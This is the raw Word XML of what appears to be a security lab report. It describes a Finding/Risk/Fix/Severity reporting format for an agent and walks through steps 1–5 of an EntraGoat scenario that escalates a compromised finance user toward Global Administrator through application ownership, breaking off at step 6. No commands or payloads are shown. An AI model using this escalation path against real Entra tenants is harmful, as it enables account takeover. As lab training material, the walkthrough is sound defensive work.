            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Baseline tenant inventory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DA04F69" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A134469" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Each finding is reported by the agent in a fixed format — Finding, Risk, Fix, Severity — enforced via the system prompt, ensuring consistent, audit-ready output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5034651B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0517AB7B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc243301429"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. EntraGoat Scenario 1 — Misowned and Dangerous</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="781A4C05" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An Owner's Manual to Global Admin</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="2E86AB"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="2E86AB"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2E86AB"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="2E86AB"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="6505F549" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF2F8"/>
            <w:tcMar>
              <w:top w:w="150" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="150" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="23E360D1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="0B1F3A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Scenario brief: </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A low-privileged finance user, David Martinez, has his credentials compromised. The objective is to escalate from this foothold to Global Administrator and retrieve a flag stored in extensionAttribute1 on the target admin account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="309FD6AD" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="300"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFB6690" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="071853F2" wp14:editId="4B5921FC">
            <wp:extent cx="5524500" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1628881287" name="Grafik 162888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771650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9A999A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 2. The six-step escalation chain from compromised user to Global Admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F036303" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc243301430"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6.1 The Walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="3FFA6187" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Summary of the eleven-step process, followed by the detailed step-by-step evidence trail:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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700"/>
        <w:gridCol w:w="6100"/>
        <w:gridCol w:w="2700"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="127F752A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="037C4034" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50B7BB4B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33991320" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tooling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="70F43917" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EBE8B20" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EEC0D50" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Deployed EntraGoat in the Pearson tenant via the PowerShell GUI (Start-EntraGoat.ps1), signed in as Global Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30C782DE" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PowerShell / Graph SDK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="4290C208" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="643F1B45" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6405FFE7" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ran Scenario 1 setup; received low-privilege credentials for david.martinez and target admin UPN prefix EntraGoat-admin-s1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="553738F4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>EntraGoat setup script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="23DD85E7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46707B22" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6430931A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Manually enumerated David's owned objects: app registrations (none), owned groups (none), group memberships (Automated-Finance-Dept, no role/ownership), owned devices (none)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36883EC9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Entra admin center</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="5EC27924" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0466C371" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75647554" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Found David listed as Owner (“Configuration Owner”) of enterprise application Finance Analytics Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29F608F5" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Entra admin center</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="1D3B3C85" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65AE479F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69FE8E07" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirmed the underlying app registration had no API permissions, no secrets, and no owners at the registration level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="659B98A1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Entra admin center</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="28DA9B76" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="048D809A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
